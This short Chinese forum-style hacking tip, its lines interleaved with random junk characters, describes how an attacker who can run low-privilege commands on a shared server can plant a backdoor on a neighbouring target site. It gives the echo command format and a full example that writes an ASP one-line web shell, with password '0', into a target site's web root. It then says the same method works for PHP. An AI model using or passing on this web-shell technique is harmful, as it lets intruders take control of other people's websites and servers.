在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。4 n9 I, }: r8 i7 o- G" C( v1 w( c
4 ^. A8 z/ B6 z) k- D) l5 C
命令格式
. D9 n, \8 q3 F5 g* d; e
d) |" K" p) u4 D$ p, xEcho 语句 >目标站绝对目录$ ]. Q% ?/ V; Y
& j9 b- w# M# t. h
例如:
; w2 |3 }! N5 S1 l9 |$ c- h2 ~8 a$ t- |5 k' _
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp3 k$ @- x! \/ G
2 F& }! K& Y0 i2 y) o. P: [1 W这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。/ S" {" |4 m# |7 J& Z9 y, f
|